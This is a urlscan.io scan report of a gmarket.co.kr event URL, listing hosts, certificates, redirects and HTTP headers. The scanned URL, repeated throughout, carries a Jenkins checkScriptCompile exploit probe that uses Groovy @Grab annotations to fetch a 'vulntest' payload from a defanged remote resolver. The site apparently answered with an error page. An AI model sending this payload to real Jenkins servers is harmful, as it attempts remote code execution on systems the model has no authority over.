urlscan.io logo urlscan.io
SecurityTrails logo

event.gmarket.co.kr Open in urlscan Pro
157.185.177.205  Public Scan

Go To Rescan Add Verdict Report
Submitted URL: http://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/c...
Effective URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/c...
Submission: On January 12 via manual from KR — Scanned from CA
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 3 IPs in 2 countries across 1 domains to perform 16 HTTP transactions. The main IP is 157.185.177.205, located in Monrovia, United States and belongs to ML-1432-54994, CA. The main domain is event.gmarket.co.kr.
TLS certificate: Issued by GlobalSign RSA OV SSL CA 2018 on March 1st 2023. Valid for: a year.
This is the only time event.gmarket.co.kr was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address AS Autonomous System
1 11 157.185.177.205 54994 (ML-1432-5...)
1 3 183.111.134.45 4766 (KIXS-AS-K...)
16 3
Apex Domain
Subdomains		 Transfer
14 gmarket.co.kr
event.gmarket.co.kr
script.gmarket.co.kr — Cisco Umbrella Rank: 670696
www.gmarket.co.kr — Cisco Umbrella Rank: 857704
image.gmarket.co.kr — Cisco Umbrella Rank: 773879
pdsssl.gmarket.co.kr — Cisco Umbrella Rank: 985879
uts.gmarket.co.kr
impssllog.gmarket.co.kr Failed
78 KB
16 1
Domain Requested by
6 event.gmarket.co.kr 1 redirects event.gmarket.co.kr
3 image.gmarket.co.kr event.gmarket.co.kr
2 pdsssl.gmarket.co.kr 1 redirects event.gmarket.co.kr
1 uts.gmarket.co.kr event.gmarket.co.kr
1 www.gmarket.co.kr event.gmarket.co.kr
1 script.gmarket.co.kr event.gmarket.co.kr
0 impssllog.gmarket.co.kr Failed event.gmarket.co.kr
16 7

This site contains no links.

Subject Issuer Validity Valid
support6.cdnetworks.net
GlobalSign RSA OV SSL CA 2018		 2023-03-01 -
2024-04-01		 a year crt.sh
*.gmarket.co.kr
DigiCert TLS RSA SHA256 2020 CA1		 2023-05-19 -
2024-06-18		 a year crt.sh

This page contains 1 frames:

Primary Page: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Frame ID: 13BAE89F635012537B674FEFE0AF299B
Requests: 16 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page URL History Show full URLs

  1. http://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps... HTTP 307
    https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps... Page URL

Page Statistics

16
Requests

69 %
HTTPS

0 %
IPv6

1
Domains

7
Subdomains

3
IPs

2
Countries

77 kB
Transfer

270 kB
Size

13
Cookies

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. http://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload HTTP 307
    https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 13
  • https://pdsssl.gmarket.co.kr/ub/add/1/view/page/1.0?url=https%3A%3BSL%3BSLevent.gmarket.co.kr%3BSLsecurityRealm%3BSLuser%3BSLadmin%3BSLdescriptorByName%3BSLorg.jenkinsci.plugins.workflow.cps.CpsFlowDefinition%3BSLcheckScriptCompile%3BQUvalue%3D%40GrabConfig(disableChecksums%3Dtrue)%2520%40GrabResolver(name%3D%2527test%2527%2C%2520root%3D%2527hxxp%3A%3BSL%3BSLaaa%2527)%2520%40Grab(group%3D%2527package%2527%2C%2520module%3D%2527vulntest%2527%2C%2520version%3D%25271%2527)%2520import%2520Payload&ref=&lang=en-US&hlen=2&sw=1600&sh=1200 HTTP 302
  • https://uts.gmarket.co.kr/ub/add/1/view/page/1.0?url=https%3A%3BSL%3BSLevent.gmarket.co.kr%3BSLsecurityRealm%3BSLuser%3BSLadmin%3BSLdescriptorByName%3BSLorg.jenkinsci.plugins.workflow.cps.CpsFlowDefinition%3BSLcheckScriptCompile%3BQUvalue%3D%40GrabConfig(disableChecksums%3Dtrue)%2520%40GrabResolver(name%3D%2527test%2527%2C%2520root%3D%2527hxxp%3A%3BSL%3BSLaaa%2527)%2520%40Grab(group%3D%2527package%2527%2C%2520module%3D%2527vulntest%2527%2C%2520version%3D%25271%2527)%2520import%2520Payload&ref=&lang=en-US&hlen=2&sw=1600&sh=1200&__proto__=

16 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
Primary Request checkScriptCompile
event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/
Redirect Chain
  • http://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver...
  • https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolve...
5 KB
3 KB 		Document
General
Check archive.org
Download Go to
Full URL
https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 /
Resource Hash
1b6517737772b901bfbc3fac83e9a4b2d728962d871b827b97708438bb1d4fb0

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
accept-language
en-CA,en;q=0.9

Response headers

Cache-Control
private
Connection
keep-alive
Content-Encoding
gzip
Content-Type
text/html
Date
Fri, 12 Jan 2024 05:27:30 GMT
P3P
CP="CAO DSP LAW CUR ADM DEV TAI PSA IVAo CONo HISo OTP OUR DELL LEG SAMo UNI COM PUR NAV INT STA"
Server
PWS/8.3.1.0.8
Transfer-Encoding
chunked
Via
1.1 PS-GMP-014Py15:8 (W), 1.1 PSmgasbIAD1pb76:10 (W)
X-Px
ms PSmgasbIAD1pb76IAD,ms PS-GMP-014Py15GMP(origin)
X-Ws-Request-Id
65a0cdc1_PSmgasbIAD1ak79_33141-59428

Redirect headers

Connection
keep-alive
Content-Length
0
Date
Fri, 12 Jan 2024 05:27:29 GMT
Location
https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Server
PWS/8.3.1.0.8
Via
1.0 PS-GMP-014Py15:8 (W), 1.1 PSmgasbIAD1pb76:10 (W)
X-Px
ms PSmgasbIAD1pb76IAD,ms PS-GMP-014Py15GMP(origin)
X-Ws-Request-Id
65a0cdc1_PSmgasbIAD1pb76_46575-63461
common.css
script.gmarket.co.kr/pc/css/ko/ 		180 KB
32 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://script.gmarket.co.kr/pc/css/ko/common.css
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 / ASP.NET
Resource Hash
d0e65a0fab1319022ccf62f680920f6196b3f3c759333d53d779378d507d320a

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:30 GMT
Content-Encoding
gzip
Via
1.1 PShgseSEL4nm28:10 (W), 1.1 PS-GMP-01qT684:1 (W), 1.1 PSmgdfDEN1jp86:4 (W), 1.1 PSmgasbIAD1ak79:21 (W)
Last-Modified
Wed, 10 Jan 2024 23:38:25 GMT
Server
PWS/8.3.1.0.8
X-Powered-By
ASP.NET
X-Ws-Request-Id
65a0cdc2_PSmgasbIAD1ak79_33575-63449
Content-Type
text/css
P3P
CP="CAO DSP LAW CUR ADM DEV TAI PSA IVAo CONo HISo OTP OUR DELL LEG SAMo UNI COM PUR NAV INT STA"
Access-Control-Allow-Origin
*
Cache-Control
max-age=600
X-Px
ms PSmgasbIAD1ak79IAD,ms PSmgdfDEN1jp86DEN,ms PS-GMP-01qT684GMP,ms PShgseSEL4nm28GMP(origin)
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
31748
sfavicon.js
www.gmarket.co.kr/challenge/neo_include/ 		2 KB
2 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://www.gmarket.co.kr/challenge/neo_include/sfavicon.js
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 / ASP.NET, ARR/3.0, ASP.NET
Resource Hash
09ade57b889637a5a418787575bc71ec21481a8bf5f4a47823daf95b2562b2a6
Security Headers
Name Value
Content-Security-Policy frame-ancestors http://*.gmarket.co.kr https://*.gmarket.co.kr http://*.g9.co.kr https://*.g9.co.kr http://*.sfcmall.com https://*.sfcmall.com;

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:30 GMT
Content-Encoding
gzip
Via
1.1 PS-GMP-014Py15:3 (W), 1.1 PSrbdjTYO3oi46:9 (W), 1.1 PS-MIA-01gqi24:8 (W), 1.1 PSmgasbIAD1pb76:10 (W)
Content-Security-Policy
frame-ancestors http://*.gmarket.co.kr https://*.gmarket.co.kr http://*.g9.co.kr https://*.g9.co.kr http://*.sfcmall.com https://*.sfcmall.com;
X-Powered-By
ASP.NET, ARR/3.0, ASP.NET
P3P
CP="CAO DSP LAW CUR ADM DEV TAI PSA IVAo CONo HISo OTP OUR DEL LEG SAMo UNI COM PUR NAV INT STA", CP="CAO DSP LAW CUR ADM DEV TAI PSA IVAo CONo HISo OTP OUR DEL LEG SAMo UNI COM PUR NAV INT STA"
X-Px
ms PSmgasbIAD1pb76IAD,ht PS-MIA-01gqi24MIA
Connection
keep-alive
Content-Length
709
Last-Modified
Fri, 12 Nov 2021 08:41:33 GMT
Server
PWS/8.3.1.0.8
ETag
"e6779c18a1d7d71:0"
X-Ws-Request-Id
65a0cdc2_PSmgasbIAD1ak79_32121-11598
Content-Type
application/javascript
Cache-Control
public
Accept-Ranges
bytes
neverdie.js
event.gmarket.co.kr/challenge/neo_include/ 		38 KB
11 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://event.gmarket.co.kr/challenge/neo_include/neverdie.js
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 /
Resource Hash
625e89496d20a81c101832afe8a68ece06924626fa126ea609fc045d3ef87e91

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:30 GMT
Content-Encoding
gzip
Via
1.1 PS-GMP-01egE13:5 (W), 1.1 PSrbdbOSA2gh42:5 (W), 1.1 PS-MIA-01gqi24:8 (W), 1.1 PSmgasbIAD1pb76:10 (W)
Last-Modified
Wed, 18 Nov 2015 23:17:01 GMT
Server
PWS/8.3.1.0.8
ETag
"80d4883a5722d11:0"
X-Ws-Request-Id
65a0cdc2_PSmgasbIAD1ak79_33141-59464
Content-Type
application/javascript
Cache-Control
max-age=1800
X-Px
ms PSmgasbIAD1pb76IAD,ht PS-MIA-01gqi24MIA
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
10368
gmkt.js
event.gmarket.co.kr/challenge/neo_include/ 		19 KB
6 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://event.gmarket.co.kr/challenge/neo_include/gmkt.js
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 /
Resource Hash
7f516a67345bb7787ce7041c599c47382d3baa58112b98aa15d6e2d071c657ed

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:31 GMT
Content-Encoding
gzip
Via
1.1 PS-GMP-01t1T16:4 (W), 1.1 PSrbdbOSA2ia45:7 (W), 1.1 PS-MIA-01gqi24:8 (W), 1.1 PSmgasbIAD1pb76:10 (W)
Last-Modified
Thu, 23 Jul 2015 22:52:41 GMT
Server
PWS/8.3.1.0.8
ETag
"80290479ac5d01:0"
Transfer-Encoding
chunked
X-Ws-Request-Id
65a0cdc2_PSmgasbIAD1ak79_32587-53654
Content-Type
application/javascript
Cache-Control
max-age=1800
X-Px
ms PSmgasbIAD1pb76IAD,ht PS-MIA-01gqi24MIA
Connection
keep-alive
Accept-Ranges
bytes
impression.js
event.gmarket.co.kr/challenge/neo_include/js/ 		6 KB
3 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://event.gmarket.co.kr/challenge/neo_include/js/impression.js
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 /
Resource Hash
642972b7741fd8abdba5cc14b4624ddf4ca7936d59051acde5bbc25c759d016f

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:32 GMT
Content-Encoding
gzip
Via
1.1 PS-GMP-01t1T16:5 (W), 1.1 PSrbdbOSA2gh42:9 (W), 1.1 hexi47:7 (W), 1.1 PSmgasbIAD1pb76:10 (W)
Last-Modified
Thu, 01 Apr 2010 22:13:39 GMT
Server
PWS/8.3.1.0.8
ETag
"80eba594e8d1ca1:0"
Transfer-Encoding
chunked
X-Ws-Request-Id
65a0cdc3_PSmgasbIAD1ak79_32587-53705
Content-Type
application/javascript
Cache-Control
max-age=1800
X-Px
ms PSmgasbIAD1pb76IAD,ht hexi47SJC
Connection
keep-alive
Accept-Ranges
bytes
err_page_not_exist.gif
image.gmarket.co.kr/challenge/gongji/ 		14 KB
15 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://image.gmarket.co.kr/challenge/gongji/err_page_not_exist.gif
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 / ASP.NET
Resource Hash
d724b761ede2856b9ae26d6dd461abc7925114974c3a829307e97cf24e893245

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:31 GMT
Via
1.1 PShgseSEL4yv29:4 (W), 1.1 PSrbdbOSA2pb43:2 (W), 1.1 PS-MIA-010Xa26:12 (W), 1.1 PSmgasbIAD1ak79:22 (W)
Last-Modified
Mon, 26 Apr 2010 05:24:48 GMT
Server
PWS/8.3.1.0.8
X-Powered-By
ASP.NET
X-Ws-Request-Id
65a0cdc2_PSmgasbIAD1ak79_33083-53006
Content-Type
image/gif
P3P
CP="CAO DSP LAW CUR ADM DEV TAI PSA IVAo CONo HISo OTP OUR DEL LEG SAMo UNI COM PUR NAV INT STA"
Cache-Control
public,max-age=1800
X-Px
ht PSmgasbIAD1ak79IAD
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
14561
CommonBaseBottom.js
event.gmarket.co.kr/challenge/neo_include/js/ 		933 B
966 B 		Script
General
Check archive.org
Download Go to
Full URL
https://event.gmarket.co.kr/challenge/neo_include/js/CommonBaseBottom.js
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 /
Resource Hash
adec8d07d8cf4622010cad299be81ea5195758a2e2adf1f230c25cd79f890160

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:31 GMT
Content-Encoding
gzip
Via
1.1 PS-GMP-014Py15:2 (W), 1.1 PSrbdbOSA2gh42:5 (W), 1.1 PS-MIA-01gqi24:8 (W), 1.1 PSmgasbIAD1pb76:10 (W)
Last-Modified
Mon, 18 Apr 2011 15:54:00 GMT
Server
PWS/8.3.1.0.8
ETag
"0dc1ad5e0fdcb1:0"
X-Ws-Request-Id
65a0cdc2_PSmgasbIAD1ak79_33083-53003
Content-Type
application/javascript
Cache-Control
max-age=1800
X-Px
ms PSmgasbIAD1pb76IAD,ht PS-MIA-01gqi24MIA
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
441
no_image.gif
image.gmarket.co.kr/challenge/neo_image/ 		183 B
747 B 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://image.gmarket.co.kr/challenge/neo_image/no_image.gif
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 / ASP.NET
Resource Hash
5e4094e3a3793e7da9e70cb0567587636a5de18d846e842630c8d29ddea15fd8

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:31 GMT
Via
1.1 PShgseSEL4hj175:4 (W), 1.1 PSrbJP1ty77:2 (W), 1.1 hx172:6 (W), 1.1 PSmgasbIAD1ak79:22 (W)
Last-Modified
Tue, 20 Dec 2016 13:11:55 GMT
Server
PWS/8.3.1.0.8
X-Powered-By
ASP.NET
X-Ws-Request-Id
65a0cdc3_PSmgasbIAD1ak79_33083-53074
Content-Type
image/gif
P3P
CP="CAO DSP LAW CUR ADM DEV TAI PSA IVAo CONo HISo OTP OUR DELL LEG SAMo UNI COM PUR NAV INT STA"
Cache-Control
public,max-age=1800
X-Px
ht PSmgasbIAD1ak79IAD
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
183
image.gif
image.gmarket.co.kr/challenge/neo_image/shopping_guide_img/ 		3 KB
4 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://image.gmarket.co.kr/challenge/neo_image/shopping_guide_img/image.gif
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
157.185.177.205 Monrovia, United States, ASN54994 (ML-1432-54994, CA),
Reverse DNS
Software
PWS/8.3.1.0.8 / ASP.NET
Resource Hash
2b3d4811235e220f47d70cf9aca2ae8d7c9657c6d816eef53698042be3cbcc85

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

Date
Fri, 12 Jan 2024 05:27:32 GMT
Via
1.1 PShgseSEL4yv29:6 (W), 1.1 PSrbdbOSA2lx44:10 (W), 1.1 PS-MIA-01gqi24:7 (W), 1.1 PSmgasbIAD1pb76:18 (W)
Last-Modified
Thu, 09 Apr 2015 22:30:52 GMT
Server
PWS/8.3.1.0.8
X-Powered-By
ASP.NET
X-Ws-Request-Id
65a0cdc3_PSmgasbIAD1ak79_32987-58154
Content-Type
image/gif
P3P
CP="CAO DSP LAW CUR ADM DEV TAI PSA IVAo CONo HISo OTP OUR DELL LEG SAMo UNI COM PUR NAV INT STA"
Cache-Control
public,max-age=1800
X-Px
ht PSmgasbIAD1pb76IAD
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
3395
jquery-1.6.4.min.js
script.gmarket.co.kr/jQuery/1.6.4/ 		0
0
Header.js
script.gmarket.co.kr/js/header/ 		0
0
Footer.js
script.gmarket.co.kr/js/header/ 		0
0
P1
pdsssl.gmarket.co.kr/cookiemanager/setguids/1/ 		0
666 B 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://pdsssl.gmarket.co.kr/cookiemanager/setguids/1/P1
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Security
TLS 1.2, RSA, AES_256_CBC
Server
183.111.134.45 , Korea, Republic Of, ASN4766 (KIXS-AS-KR Korea Telecom, KR),
Reverse DNS
Software
/
Resource Hash
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

date
Fri, 12 Jan 2024 05:27:32 GMT
cache-control
private
1.0
uts.gmarket.co.kr/ub/add/1/view/page/
Redirect Chain
  • https://pdsssl.gmarket.co.kr/ub/add/1/view/page/1.0?url=https%3A%3BSL%3BSLevent.gmarket.co.kr%3BSLsecurityRealm%3BSLuser%3BSLadmin%3BSLdescriptorByName%3BSLorg.jenkinsci.plugins.workflow.cps.CpsFlo...
  • https://uts.gmarket.co.kr/ub/add/1/view/page/1.0?url=https%3A%3BSL%3BSLevent.gmarket.co.kr%3BSLsecurityRealm%3BSLuser%3BSLadmin%3BSLdescriptorByName%3BSLorg.jenkinsci.plugins.workflow.cps.CpsFlowDe...
0
185 B 		Image
General
Check archive.org
Download Go to Show image
Full URL
